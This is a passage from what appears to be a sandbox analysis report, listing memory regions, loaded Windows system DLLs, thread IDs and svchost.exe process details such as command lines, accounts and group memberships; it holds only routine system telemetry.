end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 7403 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7404 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 7405 start_va = 0x7fef5600000 end_va = 0x7fef5610fff monitored = 0 entry_point = 0x7fef56014c0 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 7406 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 7407 start_va = 0x7fef5780000 end_va = 0x7fef57a1fff monitored = 0 entry_point = 0x7fef5781020 region_type = mapped_file name = "trkwks.dll" filename = "\\Windows\\System32\\trkwks.dll" (normalized: "c:\\windows\\system32\\trkwks.dll") Region: id = 7408 start_va = 0x7fef57b0000 end_va = 0x7fef595dfff monitored = 0 entry_point = 0x7fef57da148 region_type = mapped_file name = "sysmain.dll" filename = "\\Windows\\System32\\sysmain.dll" (normalized: "c:\\windows\\system32\\sysmain.dll") Region: id = 7409 start_va = 0x7fef5980000 end_va = 0x7fef5998fff monitored = 0 entry_point = 0x7fef5982b50 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 7410 start_va = 0x7fef59a0000 end_va = 0x7fef59affff monitored = 0 entry_point = 0x7fef59a1010 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 7411 start_va = 0x7fef59b0000 end_va = 0x7fef59c1fff monitored = 0 entry_point = 0x7fef59b1050 region_type = mapped_file name = "aepic.dll" filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll") Region: id = 7412 start_va = 0x7fef59d0000 end_va = 0x7fef5a02fff monitored = 0 entry_point = 0x7fef59d101c region_type = mapped_file name = "pcasvc.dll" filename = "\\Windows\\System32\\pcasvc.dll" (normalized: "c:\\windows\\system32\\pcasvc.dll") Region: id = 7413 start_va = 0x7fef89f0000 end_va = 0x7fef8a6bfff monitored = 0 entry_point = 0x7fef89f11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 7414 start_va = 0x7fef95d0000 end_va = 0x7fef95dffff monitored = 0 entry_point = 0x7fef95d27f0 region_type = mapped_file name = "uxsms.dll" filename = "\\Windows\\System32\\uxsms.dll" (normalized: "c:\\windows\\system32\\uxsms.dll") Region: id = 7415 start_va = 0x7fef9940000 end_va = 0x7fef994dfff monitored = 0 entry_point = 0x7fef9941050 region_type = mapped_file name = "pcadm.dll" filename = "\\Windows\\System32\\pcadm.dll" (normalized: "c:\\windows\\system32\\pcadm.dll") Region: id = 7416 start_va = 0x7fefaf00000 end_va = 0x7fefaf56fff monitored = 0 entry_point = 0x7fefaf01118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 7417 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 7418 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 7419 start_va = 0x7fefb2f0000 end_va = 0x7fefb2fafff monitored = 0 entry_point = 0x7fefb2f4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 7420 start_va = 0x7fefb300000 end_va = 0x7fefb30bfff monitored = 0 entry_point = 0x7fefb3015d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7421 start_va = 0x7fefb320000 end_va = 0x7fefb338fff monitored = 0 entry_point = 0x7fefb3211a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 7422 start_va = 0x7fefb380000 end_va = 0x7fefb3bcfff monitored = 0 entry_point = 0x7fefb381b7c region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 7423 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d4fff monitored = 0 entry_point = 0x7fefb3c60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 7424 start_va = 0x7fefb4b0000 end_va = 0x7fefb5d6fff monitored = 0 entry_point = 0x7fefb4b10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 7425 start_va = 0x7fefb5e0000 end_va = 0x7fefb60ffff monitored = 0 entry_point = 0x7fefb5ffe98 region_type = mapped_file name = "peerdist.dll" filename = "\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll") Region: id = 7426 start_va = 0x7fefb610000 end_va = 0x7fefb6bbfff monitored = 0 entry_point = 0x7fefb6218d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 7427 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 7428 start_va = 0x7fefb6f0000 end_va = 0x7fefb71bfff monitored = 0 entry_point = 0x7fefb6f15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 7429 start_va = 0x7fefb720000 end_va = 0x7fefb7cbfff monitored = 0 entry_point = 0x7fefb736acc region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 7430 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 7431 start_va = 0x7fefbc00000 end_va = 0x7fefbc34fff monitored = 0 entry_point = 0x7fefbc01064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 7432 start_va = 0x7fefbc60000 end_va = 0x7fefbcaafff monitored = 0 entry_point = 0x7fefbc6efcc region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 7433 start_va = 0x7fefc0d0000 end_va = 0x7fefc1fbfff monitored = 0 entry_point = 0x7fefc0d94bc region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7434 start_va = 0x7fefc250000 end_va = 0x7fefc443fff monitored = 0 entry_point = 0x7fefc3dc924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 7435 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 7436 start_va = 0x7fefc910000 end_va = 0x7fefc91bfff monitored = 0 entry_point = 0x7fefc911064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 7437 start_va = 0x7fefcad0000 end_va = 0x7fefcaeafff monitored = 0 entry_point = 0x7fefcad2068 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 7438 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 7439 start_va = 0x7fefcb10000 end_va = 0x7fefcb21fff monitored = 0 entry_point = 0x7fefcb11060 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 7440 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 7441 start_va = 0x7fefcc50000 end_va = 0x7fefcc5cfff monitored = 0 entry_point = 0x7fefcc51348 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 7442 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 7443 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 7444 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 7445 start_va = 0x7fefd210000 end_va = 0x7fefd23efff monitored = 0 entry_point = 0x7fefd211064 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 7446 start_va = 0x7fefd250000 end_va = 0x7fefd2bcfff monitored = 0 entry_point = 0x7fefd251010 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 7447 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 7448 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 7449 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 7450 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 7451 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 7452 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 7453 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 7454 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 7455 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7456 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 7457 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 7458 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 7459 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 7460 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7461 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7462 start_va = 0x7fefdee0000 end_va = 0x7fefec67fff monitored = 0 entry_point = 0x7fefdf5cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 7463 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7464 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 7465 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7466 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7467 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7468 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7469 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 7470 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7471 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7472 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7473 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7474 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7475 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 7476 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7477 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7478 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 7479 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 7480 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 7481 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 7482 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 7483 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 7484 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 7485 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 7486 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 7487 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 7488 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 7489 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 7490 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 7491 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 7492 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7493 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 7494 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 7495 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 7496 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 7497 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 362 os_tid = 0x738 Thread: id = 363 os_tid = 0x67c Thread: id = 364 os_tid = 0x78c Thread: id = 365 os_tid = 0x68c Thread: id = 366 os_tid = 0x680 Thread: id = 367 os_tid = 0x414 Thread: id = 368 os_tid = 0x114 Thread: id = 369 os_tid = 0x3e0 Thread: id = 370 os_tid = 0x3d4 Thread: id = 371 os_tid = 0x3d0 Thread: id = 372 os_tid = 0x3c0 Thread: id = 373 os_tid = 0x3bc Thread: id = 374 os_tid = 0x388 Thread: id = 375 os_tid = 0x374 Thread: id = 376 os_tid = 0x370 Thread: id = 377 os_tid = 0x358 Thread: id = 378 os_tid = 0x340 Thread: id = 379 os_tid = 0x330 Process: id = "42" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6d65000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1f0" [0xc000000f], "LOCAL" [0x7] Thread: id = 380 os_tid = 0xf84 Thread: id = 381 os_tid = 0xeac Thread: id = 382 os_tid = 0x794 Thread: id = 383 os_tid = 0x778 Thread: id = 384 os_tid = 0x750 Thread: id = 385 os_tid = 0x734 Thread: id = 386 os_tid = 0x71c Thread: id = 387 os_tid = 0x16c Thread: id = 388 os_tid = 0xcc Thread: id = 389 os_tid = 0x3fc Process: id = "43" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0xc84000" os_pid = "0x454" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:00010ddd" [0xc000000f], "LOCAL" [0x7] Region: id = 7075 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7076 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 7077 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7078 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7079 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 7080 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 7081 start_va = 0x70000 end_va = 0x77fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 7082 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 7083 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 7084 start_va = 0xa0000 end_va = 0xa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 7085 start_va = 0xb0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 7086 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 7087 start_va = 0x140000 end_va = 0x140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 7088 start_va = 0x150000 end_va = 0x169fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 7089 start_va = 0x170000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 7090 start_va = 0x270000 end_va = 0x2d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7091 start_va = 0x2e0000 end_va = 0x39ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 7092 start_va = 0x3a0000 end_va = 0x3a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 7093 start_va = 0x3b0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = 